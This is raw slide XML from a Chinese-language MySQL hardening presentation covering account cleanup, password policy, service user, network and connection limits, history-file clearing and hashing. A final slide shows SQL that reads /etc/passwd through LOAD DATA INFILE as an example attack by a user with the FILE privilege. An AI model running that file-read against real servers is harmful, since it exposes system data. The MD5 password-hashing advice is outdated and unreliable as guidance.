              <a:t>MySQL初始化后会自动生成空用户和test库，进行安装的测试，这会对数据库的安全构成威胁，有必要全部删除，最后的状态只保留单个root即可，当然以后根据需要增加用户和数据库。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>mysql&gt; show databases;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>mysql&gt; drop database test; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>//删除数据库test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mysql&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>use mysql;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mysql&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>delete from db;                            //删除存放数据库的表信息，因为还没有数据库信息。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>mysql&gt; delete from user where not (user='root');             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	     </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>// 删除初始非root的用户</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>mysql&gt; delete from user where user='root' and password='';  //删除空密码的root尽量重复操作</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>mysql&gt; flush privileges; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>//强制刷新内存授权表。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2049780" y="3511550"/>
            <a:ext cx="6295390" cy="962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不使用默认密码和弱口令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787082" y="1307503"/>
            <a:ext cx="10175240" cy="3139321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>检查账户默认密码和弱口令，口令长度至少</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>位，并包括数字、小写字母、大写字母和特殊符号四类中至少两种。且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>次以内不得设置相同的口令，密码应至少</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>90</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>天更换一次。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt; Update user set password=password(‘test!p3’) where user=‘root’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Flush privileges;</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>检测操作</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>检查本地密码： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注意，管理帐号 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>默认是空密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt; use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt; select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Host,User,Password,Select_priv,Grant_priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> from user; 	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="145875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24130"/>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改变默认mysql管理员帐号</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080135" y="1226820"/>
            <a:ext cx="10175240" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>改变默认的mysql管理员账号也可以使mysql数据库的安全性有较好的提高，因为默认的mysql管理员的用户名都是root</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>mysql&gt; update mysql.user set user='admin' where user='root';</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2019398" y="2863984"/>
            <a:ext cx="5457190" cy="1209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使用独立用户运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080135" y="1226820"/>
            <a:ext cx="10175240" cy="3660140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>绝对不要作为使用root用户运行MySQL服务器。这样做非常危险，因为任何具有FILE权限的用户能够用root创建文件</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(例如，~root/.bashrc)。mysqld拒绝使用root运行，除非使用–user=root选项明显指定。应该用普通非特权用户运行 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>mysql。为数据库建立独立的linux中的mysql账户，该账户用来只用于管理和运行MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>要想用其它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>用户启动mysql，增加user选项指定</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>/etc/my.cnf选项文件或服务器数据目录的my.cnf选项文件中的[mysqld]组的用户名。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>#vi /etc/my.cnf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>[mysqld]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>user=mysql</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>该命令使服务器用指定的用户来启动，无论你手动启动或通过mysqld_safe或mysql.server启动，都能确保使用mysql的身份。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1144270" y="4863465"/>
            <a:ext cx="5895340" cy="1828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禁止远程连接数据库</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080135" y="1226820"/>
            <a:ext cx="10175240" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>使用命令netstat 查看默认的3306端口是打开的，此时打开了mysql的网络监听，允许用户远程通过帐号密码连接数本地据库，默认情况是允许远程连接数据的。为了禁止该功能，启动skip-networking，不监听sql的任何TCP/IP的连接，切断远程访问的权利，保证安全性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># vi /etc/my.cf       //将#skip-networking注释去掉。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1952625" y="2356358"/>
            <a:ext cx="7495540" cy="504825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1952625" y="3880993"/>
            <a:ext cx="6857365" cy="1666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限制用户连接的数量</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080135" y="1242060"/>
            <a:ext cx="10175240" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>数据库的某用户多次远程连接，会导致性能的下降和影响其他用户的操作，有必要对其进行限制。可以通过限制单个账户允许的连接数量来实现，设置my.cnf 文件的mysql中的max_user_connections变量来完成。GRANT语句也可以支持资源控制选项来限制服务器对一个账户允许的使用范围。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>#vi /etc/my.cnf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>[mysqld]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>max_user_connections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1180922" y="3726171"/>
            <a:ext cx="7152640" cy="1933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1526540" y="1618615"/>
            <a:ext cx="5904230" cy="2150745"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据库安全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命令历史记录保护</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080135" y="1226820"/>
            <a:ext cx="10175240" cy="2837180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>数据库相关的shell操作命令都会分别记录在.bash_history，如果这些文件不慎被读取，会导致数据库密码和数据库结构等信息泄露，而登陆数据库后的操作将记录在.mysql_history文件中，如果使用update表信息来修改数据库用户密码的话，也会被读取密码，因此需要删除这两个文件，同时在进行登陆或备份数据库等与密码相关操作时，应该使用-p参数加入提示输入密码后，隐式输入密码，建议将以上文件置空。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t># rm .bash_history .</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>mysql_history</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>		 //删除历史记录</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t># ln -s /dev/null .bash_history 		//将shell记录文件置空</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t># ln -s /dev/null .</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>mysql_history</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>		 //</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>将mysql记录文件置空</a:t>
            </a:r>
            <a:endParaRPr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对重要数据加密存储</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080135" y="1226820"/>
            <a:ext cx="10175240" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>提供了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个函数用于哈希加密：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PASSWORD, ENCRYPT, SHA1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MD5。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>INSERT INTO table1 (user, p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>word) VALUE ('user1', MD5('password1') )</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1222168" y="2453412"/>
            <a:ext cx="4037902" cy="1499167"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6167755" y="2581931"/>
            <a:ext cx="4821015" cy="1453395"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1902699" y="4647411"/>
            <a:ext cx="3473281" cy="1609288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6809774" y="4467107"/>
            <a:ext cx="4445601" cy="1637853"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="359215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0015" y="5778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本地文件读取保护</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1430020" y="1227911"/>
            <a:ext cx="10175240" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>常见攻击：拥有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>FILE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dababase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> use;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CREATE TABLE etc_passwd (pwd_entry TEXT);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>LOAD DATA INFILE "/etc/passwd" into TABLE etc_passwd;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SELECT * FROM etc_passwd;</a:t>
            </a:r>
